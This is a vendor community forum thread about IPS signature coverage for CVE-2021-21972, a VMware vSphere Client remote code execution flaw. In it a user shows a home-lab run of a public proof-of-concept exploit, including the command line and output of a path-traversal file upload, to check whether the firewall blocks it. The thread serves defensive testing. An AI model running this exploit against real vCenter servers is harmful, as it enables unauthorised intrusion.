Create a Post
cancel
Showing results for 
Search instead for 
Did you mean: 
erondicarvalho
Explorer

Does Check Point has CVE-2021-21972 IPS protection?

Jump to solution
 

Hello 

I have updated IPS on management but I cannot find CVE-2021-21972 signature.

Does Check Point has CVE-2021-21972 IPS protection?

Does Check Point has plan to release this signature?

 

Thank you.

0 Kudos
2 Solutions

Accepted Solutions
_Val_
Admin
Admin

The vulnerability was announced yesterday. Until there is a proof of concept, or a working exploit, IPS signature cannot be produced. VMware has posted a workaround here, that you can apply meanwhile

View solution in original post

Avi_Bechor
Employee
Employee

Hi,

An IPS protection was released for this vulnerability.
Protection name: "VMware vSphere Client Remote Code Execution (CVE-2021-21972)"

Thanks,
Avi

View solution in original post

5 Replies
_Val_
Admin
Admin

The vulnerability was announced yesterday. Until there is a proof of concept, or a working exploit, IPS signature cannot be produced. VMware has posted a workaround here, that you can apply meanwhile

View solution in original post

Sigbjorn
Advisor

This exploit is in the wild now.

Proof of Concept available on github; https://github.com/horizon3ai/CVE-2021-21972

Any updates on IPS signatures?

 

 

0 Kudos
Avi_Bechor
Employee
Employee

Hi,

An IPS protection was released for this vulnerability.
Protection name: "VMware vSphere Client Remote Code Execution (CVE-2021-21972)"

Thanks,
Avi

View solution in original post

Sigbjorn
Advisor

I don't seem to have any luck triggering this protection.

Testing at home:

Check Point 3100 - R80.40 JHA91
[Expert@cp-fw01:0]# ips stat
IPS Status: Enabled
Active Profiles:
Custom Optimized
IPS Update Version: 635211403
Global Detect: Off
Bypass Under Load: Off

Second test:

VSX R80.30 JHA 227 (Open server)

[Expert@<vsxhostname>:<vsid>]# ips stat
IPS Status: Enabled
IPS Update Version: 635211403
Global Detect: Off
Bypass Under Load: Off

 

In the test, I'm just running the PoC Code from Github.

x@y:~/CVE-2021-21972$ python3 poc.py -t 10.99.9.9 -f testfile.txt -p /home/vsphere-ui/testfile.txt -o unix
[+] 10.99.9.9 vulnerable to CVE-2021-21972!
[+] Adding testfile.txt as ../../../../../home/vsphere-ui/testfile.txt to archive
[+] Wrote testfile.txt to exploit.tar on local filesystem
[+] File uploaded successfully

 

root@photon-machine [ ~ ]# cd /home/vsphere-ui/
root@photon-machine [ /home/vsphere-ui ]# ls
testfile.txt
root@photon-machine [ /home/vsphere-ui ]# cat testfile.txt
test
root@photon-machine [ /home/vsphere-ui ]#

 

 

0 Kudos
Avi_Bechor
Employee
Employee

Hi,

The PoC you shared is blocked based on our internal testing, I am taking this with you offline to ensure that you configured the testing correctly

Avi

0 Kudos